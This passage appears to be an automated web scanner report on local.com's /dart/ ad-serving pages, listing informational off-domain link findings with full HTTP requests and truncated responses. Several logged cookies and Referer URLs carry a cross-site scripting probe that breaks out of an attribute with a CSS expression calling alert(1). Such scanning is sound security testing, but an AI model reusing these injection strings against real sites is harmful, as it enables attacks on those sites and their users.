Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.39. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.40. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.41. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748869864?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.42. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748884962?

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:12 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.43. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748870273?

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.44. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag\\x3dTrue\\x26css\\x3dbanner\\x26p\\x3dlocm.pp\\x26pos\\x3d1\\x26t\\x3d1\\x26sz\\x3d728x90\\x26ord\\x3d1296748870273\\x26k\\x3dbanks\\x26l\\x3dDallas%2C+TX\

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=-630855521536376832?
http://ad.doubleclick.net/jump/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=-630855521536376832?

Request

GET /dart/?ag\\x3dTrue\\x26css\\x3dbanner\\x26p\\x3dlocm.pp\\x26pos\\x3d1\\x26t\\x3d1\\x26sz\\x3d728x90\\x26ord\\x3d1296748870273\\x26k\\x3dbanks\\x26l\\x3dDallas%2C+TX\ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 768
Date: Thu, 03 Feb 2011 16:43:54 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=-630855521536376832?" target="_blank"><img src="http://ad.doubleclick.net/ad/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=-630855521536376832?" border="0" alt="" /></a>
...[SNIP]...

8.45. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748883062?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.46. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748848750&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748848750?

Request

GET /dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748848750&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
